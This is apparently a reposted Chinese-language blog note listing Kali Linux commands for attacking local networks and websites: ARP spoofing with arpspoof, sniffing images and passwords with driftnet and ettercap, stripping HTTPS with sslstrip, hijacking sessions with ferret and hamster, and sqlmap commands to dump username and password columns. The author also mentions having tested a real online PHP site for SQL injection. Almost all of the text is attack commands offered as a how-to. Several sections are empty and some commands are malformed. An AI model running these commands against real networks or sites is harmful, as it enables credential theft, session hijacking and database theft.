kali 局域網嗅探


1、局域網圖片嗅探

     工具  arpspoof

      arpspoof -i eth0 -t 192.1681.10(網卡 目標地址) 192.168.1.1 局域網網關,如果在Windows中可以使用局域網掃描工具  Advanced ip Scanner

        linux中 掃描局域網在線的主機 fping -asg 192.168.1.0/24 

                    
        欺騙的同時不能是對方斷網,使用流量轉發  echo 1 >/proc/sys/net/ipv4/ip_forward   

        檢查是否成功執行     cat  proc/sys/sys/net/ipv4/ip_forward          
                     獲取本機網卡的圖片   driftnet -i eth0

2、密碼嗅探 <http>

       先使用欺騙命令 arpspoof

         ettercap -Tq - i eth0

   

3、ssh遠程連接操作  鏈接kali  shell模式注銷

     ctrl +Alt +F1   切換到 命令行模式

      使用命令   /etc/init.d/ssh  start

      使用Xshell 鏈接kali ip

4、抓包https流量

     首先編輯    vim /etc/ettercap/etter.conf   修改  ****linux **  取消 #

    開啟 sslstrip -a -f -k

     開啟欺騙  arpspoof  同時轉發流量 

   在https 網址上進行登陸 抓取流量

 5、會話劫持登陸已經被別人登陸的網站

    快速添加之前使用的命令  ! + 部分命令  就會補全

    先使用arpspoof 欺騙 同時流量轉發

    使用 wireshark 流量抓包工具

     使用 ferret 重新生成抓包的工具

     ferret  -r  j加上 抓取的流量包  會生成一個 txt文件

    使用 hamster  -h打開一個瀏覽器        -----》 設置代理和端口   

    或者不適用欺騙,直接使用 ferret -i eth0  然后使用 hamster  瀏覽網頁  

    另外基於界面的軟件 cookieCadger

6、sqlmap 對asp網站的檢測

      sqlmap -u "www.baidu.com.id=2" 

       sqlmap -u "www.baidu.com.id=2"   --tables

       sqlmap -u "www.baidu.com.id=2"     --columns -T  "user"

         sqlmap -u "www.baidu.com.id=2"  --dump  -C "username ,password" -T "user"

    cookie使用     sqlmap -u “  www.baidu.com.php.id=2”   --cookie "id=23" --level=2

     

7、sqlmap 對php網站的檢測

       sqlmap -u “  www.baidu.com.php.id=2”  --is-dba   檢測是否是dba 形式  (可以將文件寫入目錄)

        sqlmap -u “  www.baidu.com.php.id=2”  --dbs   (列出所有的數據庫)

      sqlmap -u “  www.baidu.com.php.id=2”   --current-db     (猜測當前的數據庫)

        sqlmap -u “  www.baidu.com.php.id=2”  --tables -D "admin"   (根據admin數據庫猜測表名)

         sqlmap -u “  www.baidu.com.php.id=2”   --columns -T "pss"  -D "admin"

         sqlmap -u “  www.baidu.com.php.id=2”  --dump  -C "username,password " -T "pss"  -D "admin"

8、實例檢測

   下面是我檢測的一個網上的PHP的網站 存在SQL注入的漏洞

9、Metasploit

     msfconsole

     這一節我之前的微博已經寫過很多,不過還沒喲整理,想着抽空整理一遍

   

    

10、流量分析工具 nload

        附: 卸載之前暗轉的軟件 apt-get remove 

             修復沒有成功安裝的軟件   apt --fix-broken install

11、metasploit

    使用Metasploit 輔助模塊 wmap進行掃描(對網站進行集中的掃描)

    使用Sqlmap輔助模塊進行掃描:

 

      

   

   

 

 

 

    

    

     

 

   

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM